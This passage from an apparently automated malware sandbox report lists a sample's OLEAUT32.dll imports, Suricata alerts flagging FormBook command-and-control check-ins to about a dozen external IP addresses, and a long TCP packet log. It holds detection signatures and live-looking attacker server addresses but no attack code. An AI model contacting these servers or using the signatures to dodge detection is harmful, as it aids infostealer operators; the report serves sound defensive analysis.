OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T16:41:48.012262+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49904	154.213.39.66	80	TCP
2025-01-10T16:41:48.012262+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49904	154.213.39.66	80	TCP
2025-01-10T16:42:03.773478+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49977	46.38.243.234	80	TCP
2025-01-10T16:42:06.316926+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49978	46.38.243.234	80	TCP
2025-01-10T16:42:08.872985+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49979	46.38.243.234	80	TCP
2025-01-10T16:42:11.421639+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49980	46.38.243.234	80	TCP
2025-01-10T16:42:11.421639+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49980	46.38.243.234	80	TCP
2025-01-10T16:42:25.130232+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49981	209.74.79.42	80	TCP
2025-01-10T16:42:27.942811+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49982	209.74.79.42	80	TCP
2025-01-10T16:42:30.510802+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49983	209.74.79.42	80	TCP
2025-01-10T16:42:33.077627+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49984	209.74.79.42	80	TCP
2025-01-10T16:42:33.077627+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49984	209.74.79.42	80	TCP
2025-01-10T16:42:38.768920+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49985	47.254.140.255	80	TCP
2025-01-10T16:42:41.318777+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49986	47.254.140.255	80	TCP
2025-01-10T16:42:43.936914+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49987	47.254.140.255	80	TCP
2025-01-10T16:42:47.377173+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49988	47.254.140.255	80	TCP
2025-01-10T16:42:47.377173+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49988	47.254.140.255	80	TCP
2025-01-10T16:42:54.180791+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49989	85.159.66.93	80	TCP
2025-01-10T16:42:56.724353+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49990	85.159.66.93	80	TCP
2025-01-10T16:42:59.270659+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49991	85.159.66.93	80	TCP
2025-01-10T16:43:01.013291+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49992	85.159.66.93	80	TCP
2025-01-10T16:43:01.013291+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49992	85.159.66.93	80	TCP
2025-01-10T16:43:06.731143+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49993	188.114.97.3	80	TCP
2025-01-10T16:43:09.258140+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49994	188.114.97.3	80	TCP
2025-01-10T16:43:11.874048+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49995	188.114.97.3	80	TCP
2025-01-10T16:43:14.364425+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49996	188.114.97.3	80	TCP
2025-01-10T16:43:14.364425+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49996	188.114.97.3	80	TCP
2025-01-10T16:43:28.215881+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49997	199.59.243.228	80	TCP
2025-01-10T16:43:30.730742+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49998	199.59.243.228	80	TCP
2025-01-10T16:43:33.321105+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49999	199.59.243.228	80	TCP
2025-01-10T16:43:35.832142+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	50000	199.59.243.228	80	TCP
2025-01-10T16:43:35.832142+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50000	199.59.243.228	80	TCP
2025-01-10T16:43:41.665841+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50001	208.91.197.27	80	TCP
2025-01-10T16:43:44.195904+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50002	208.91.197.27	80	TCP
2025-01-10T16:43:46.727809+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50003	208.91.197.27	80	TCP
2025-01-10T16:43:49.757481+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	50004	208.91.197.27	80	TCP
2025-01-10T16:43:49.757481+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50004	208.91.197.27	80	TCP
2025-01-10T16:43:55.714507+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50005	136.243.64.147	80	TCP
2025-01-10T16:43:58.233396+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50006	136.243.64.147	80	TCP
2025-01-10T16:44:00.768784+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50007	136.243.64.147	80	TCP
2025-01-10T16:44:03.381007+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	50008	136.243.64.147	80	TCP
2025-01-10T16:44:03.381007+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50008	136.243.64.147	80	TCP
2025-01-10T16:44:17.106873+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50009	104.21.48.1	80	TCP
2025-01-10T16:44:19.551968+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50010	104.21.48.1	80	TCP
2025-01-10T16:44:22.133759+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50011	104.21.48.1	80	TCP
2025-01-10T16:44:24.662228+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	50012	104.21.48.1	80	TCP
2025-01-10T16:44:24.662228+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50012	104.21.48.1	80	TCP
2025-01-10T16:44:39.499291+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50013	134.122.133.80	80	TCP
2025-01-10T16:44:42.073026+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50014	134.122.133.80	80	TCP
2025-01-10T16:44:44.612294+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50015	134.122.133.80	80	TCP
2025-01-10T16:44:47.149248+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	50016	134.122.133.80	80	TCP
2025-01-10T16:44:47.149248+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50016	134.122.133.80	80	TCP
2025-01-10T16:44:52.908231+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50017	93.127.192.201	80	TCP
2025-01-10T16:44:55.411921+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50018	93.127.192.201	80	TCP
2025-01-10T16:44:57.944992+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50019	93.127.192.201	80	TCP
2025-01-10T16:45:00.493092+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	50020	93.127.192.201	80	TCP
2025-01-10T16:45:00.493092+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50020	93.127.192.201	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 16:41:47.081957102 CET	49904	80	192.168.2.5	154.213.39.66
Jan 10, 2025 16:41:47.086894035 CET	80	49904	154.213.39.66	192.168.2.5
Jan 10, 2025 16:41:47.086973906 CET	49904	80	192.168.2.5	154.213.39.66
Jan 10, 2025 16:41:47.097542048 CET	49904	80	192.168.2.5	154.213.39.66
Jan 10, 2025 16:41:47.102402925 CET	80	49904	154.213.39.66	192.168.2.5
Jan 10, 2025 16:41:48.012099981 CET	80	49904	154.213.39.66	192.168.2.5
Jan 10, 2025 16:41:48.012119055 CET	80	49904	154.213.39.66	192.168.2.5
Jan 10, 2025 16:41:48.012262106 CET	49904	80	192.168.2.5	154.213.39.66
Jan 10, 2025 16:41:48.015549898 CET	49904	80	192.168.2.5	154.213.39.66
Jan 10, 2025 16:41:48.020492077 CET	80	49904	154.213.39.66	192.168.2.5
Jan 10, 2025 16:42:03.127033949 CET	49977	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:03.131923914 CET	80	49977	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:03.132035971 CET	49977	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:03.144748926 CET	49977	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:03.149652004 CET	80	49977	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:03.773226023 CET	80	49977	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:03.773242950 CET	80	49977	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:03.773478031 CET	49977	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:04.645848036 CET	49977	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:05.665154934 CET	49978	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:05.670159101 CET	80	49978	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:05.670505047 CET	49978	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:05.682810068 CET	49978	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:05.687773943 CET	80	49978	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:06.316595078 CET	80	49978	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:06.316628933 CET	80	49978	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:06.316926003 CET	49978	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:07.192631006 CET	49978	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:08.212445974 CET	49979	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:08.217433929 CET	80	49979	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:08.217544079 CET	49979	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:08.238205910 CET	49979	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:08.243135929 CET	80	49979	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:08.243247986 CET	80	49979	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:08.872823954 CET	80	49979	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:08.872900009 CET	80	49979	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:08.872984886 CET	49979	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:09.755053043 CET	49979	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:10.773255110 CET	49980	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:10.778060913 CET	80	49980	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:10.780020952 CET	49980	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:10.788733959 CET	49980	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:10.793530941 CET	80	49980	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:11.421376944 CET	80	49980	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:11.421577930 CET	80	49980	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:11.421638966 CET	49980	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:11.423842907 CET	49980	80	192.168.2.5	46.38.243.234
Jan 10, 2025 16:42:11.428596020 CET	80	49980	46.38.243.234	192.168.2.5
Jan 10, 2025 16:42:24.532980919 CET	49981	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:24.537776947 CET	80	49981	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:24.537879944 CET	49981	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:24.583030939 CET	49981	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:24.587938070 CET	80	49981	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:25.130162001 CET	80	49981	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:25.130181074 CET	80	49981	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:25.130232096 CET	49981	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:26.098984957 CET	49981	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:27.357536077 CET	49982	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:27.362392902 CET	80	49982	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:27.362483978 CET	49982	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:27.385236979 CET	49982	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:27.390028000 CET	80	49982	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:27.942660093 CET	80	49982	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:27.942708015 CET	80	49982	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:27.942811012 CET	49982	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:28.895695925 CET	49982	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:29.914274931 CET	49983	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:29.920475960 CET	80	49983	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:29.920572042 CET	49983	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:29.934814930 CET	49983	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:29.939678907 CET	80	49983	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:29.939692020 CET	80	49983	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:30.510641098 CET	80	49983	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:30.510665894 CET	80	49983	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:30.510802031 CET	49983	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:31.442569017 CET	49983	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:32.461029053 CET	49984	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:32.466012955 CET	80	49984	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:32.466325045 CET	49984	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:32.474770069 CET	49984	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:32.479578972 CET	80	49984	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:33.077318907 CET	80	49984	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:33.077512026 CET	80	49984	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:33.077626944 CET	49984	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:33.081124067 CET	49984	80	192.168.2.5	209.74.79.42
Jan 10, 2025 16:42:33.085948944 CET	80	49984	209.74.79.42	192.168.2.5
Jan 10, 2025 16:42:38.107342958 CET	49985	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:38.112154961 CET	80	49985	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:38.112229109 CET	49985	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:38.126777887 CET	49985	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:38.131525040 CET	80	49985	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:38.768768072 CET	80	49985	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:38.768816948 CET	80	49985	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:38.768856049 CET	80	49985	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:38.768919945 CET	49985	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:38.768919945 CET	49985	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:39.630250931 CET	49985	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:40.650055885 CET	49986	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:40.654983044 CET	80	49986	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:40.655056953 CET	49986	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:40.675348997 CET	49986	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:40.680135965 CET	80	49986	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:41.318680048 CET	80	49986	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:41.318716049 CET	80	49986	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:41.318739891 CET	80	49986	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:41.318777084 CET	49986	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:41.318814039 CET	49986	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:42.176894903 CET	49986	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:43.197324038 CET	49987	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:43.202272892 CET	80	49987	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:43.202369928 CET	49987	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:43.222773075 CET	49987	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:43.227638006 CET	80	49987	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:43.227962971 CET	80	49987	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:43.936732054 CET	80	49987	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:43.936772108 CET	80	49987	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:43.936870098 CET	80	49987	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:43.936913967 CET	49987	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:43.944803953 CET	49987	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:44.739484072 CET	49987	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:45.759257078 CET	49988	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:46.752437115 CET	80	49988	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:46.755186081 CET	49988	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:46.764769077 CET	49988	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:46.769624949 CET	80	49988	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:47.376975060 CET	80	49988	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:47.377021074 CET	80	49988	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:47.377060890 CET	80	49988	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:47.377172947 CET	49988	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:47.380808115 CET	49988	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:47.422610044 CET	49988	80	192.168.2.5	47.254.140.255
Jan 10, 2025 16:42:47.427455902 CET	80	49988	47.254.140.255	192.168.2.5
Jan 10, 2025 16:42:52.641113043 CET	49989	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:52.646030903 CET	80	49989	85.159.66.93	192.168.2.5
Jan 10, 2025 16:42:52.647751093 CET	49989	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:52.662290096 CET	49989	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:52.667041063 CET	80	49989	85.159.66.93	192.168.2.5
Jan 10, 2025 16:42:54.180790901 CET	49989	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:54.185935974 CET	80	49989	85.159.66.93	192.168.2.5
Jan 10, 2025 16:42:54.192804098 CET	49989	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:55.195890903 CET	49990	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:55.200790882 CET	80	49990	85.159.66.93	192.168.2.5
Jan 10, 2025 16:42:55.200915098 CET	49990	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:55.218323946 CET	49990	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:55.223119020 CET	80	49990	85.159.66.93	192.168.2.5
Jan 10, 2025 16:42:56.724353075 CET	49990	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:56.729505062 CET	80	49990	85.159.66.93	192.168.2.5
Jan 10, 2025 16:42:56.729631901 CET	49990	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:57.743022919 CET	49991	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:57.747920036 CET	80	49991	85.159.66.93	192.168.2.5
Jan 10, 2025 16:42:57.748048067 CET	49991	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:57.765121937 CET	49991	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:57.769985914 CET	80	49991	85.159.66.93	192.168.2.5
Jan 10, 2025 16:42:57.770087957 CET	80	49991	85.159.66.93	192.168.2.5
Jan 10, 2025 16:42:59.270658970 CET	49991	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:42:59.276148081 CET	80	49991	85.159.66.93	192.168.2.5
Jan 10, 2025 16:42:59.276201010 CET	49991	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:43:00.289855003 CET	49992	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:43:00.294984102 CET	80	49992	85.159.66.93	192.168.2.5
Jan 10, 2025 16:43:00.295092106 CET	49992	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:43:00.304539919 CET	49992	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:43:00.309416056 CET	80	49992	85.159.66.93	192.168.2.5
Jan 10, 2025 16:43:01.012867928 CET	80	49992	85.159.66.93	192.168.2.5
Jan 10, 2025 16:43:01.012950897 CET	80	49992	85.159.66.93	192.168.2.5
Jan 10, 2025 16:43:01.013290882 CET	49992	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:43:01.016161919 CET	49992	80	192.168.2.5	85.159.66.93
Jan 10, 2025 16:43:01.020972013 CET	80	49992	85.159.66.93	192.168.2.5
Jan 10, 2025 16:43:06.049638987 CET	49993	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:06.054405928 CET	80	49993	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:06.055321932 CET	49993	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:06.069935083 CET	49993	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:06.074728012 CET	80	49993	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:06.731039047 CET	80	49993	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:06.731060028 CET	80	49993	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:06.731142998 CET	49993	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:06.732902050 CET	80	49993	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:06.733000994 CET	49993	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:07.583148003 CET	49993	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:08.603570938 CET	49994	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:08.608388901 CET	80	49994	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:08.608547926 CET	49994	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:08.623779058 CET	49994	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:08.628633976 CET	80	49994	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:09.258049965 CET	80	49994	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:09.258068085 CET	80	49994	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:09.258140087 CET	49994	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:09.258652925 CET	80	49994	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:09.258706093 CET	49994	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:10.131481886 CET	49994	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:11.167834044 CET	49995	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:11.172758102 CET	80	49995	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:11.172842026 CET	49995	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:11.199774027 CET	49995	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:11.204623938 CET	80	49995	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:11.204785109 CET	80	49995	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:11.873975992 CET	80	49995	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:11.873991966 CET	80	49995	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:11.874047995 CET	49995	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:11.875158072 CET	80	49995	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:11.875216007 CET	49995	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:12.708291054 CET	49995	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:13.727257967 CET	49996	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:13.732275009 CET	80	49996	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:13.732414961 CET	49996	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:13.742938995 CET	49996	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:13.747766972 CET	80	49996	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:14.364311934 CET	80	49996	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:14.364327908 CET	80	49996	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:14.364424944 CET	49996	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:14.364684105 CET	80	49996	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:14.364744902 CET	49996	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:14.367269993 CET	49996	80	192.168.2.5	188.114.97.3
Jan 10, 2025 16:43:14.372050047 CET	80	49996	188.114.97.3	192.168.2.5
Jan 10, 2025 16:43:27.726793051 CET	49997	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:27.731719017 CET	80	49997	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:27.733218908 CET	49997	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:27.747950077 CET	49997	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:27.752845049 CET	80	49997	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:28.215792894 CET	80	49997	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:28.215812922 CET	80	49997	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:28.215826988 CET	80	49997	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:28.215881109 CET	49997	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:29.255358934 CET	49997	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:30.274415016 CET	49998	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:30.279227972 CET	80	49998	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:30.279304981 CET	49998	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:30.297784090 CET	49998	80	192.168.2.5	199.59.243.228
Jan 10, 2025 16:43:30.302640915 CET	80	49998	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:30.730664968 CET	80	49998	199.59.243.228	192.168.2.5
Jan 10, 2025 16:43:30.730680943 CET	80	49998	199.59.243.228	192.168.2.5
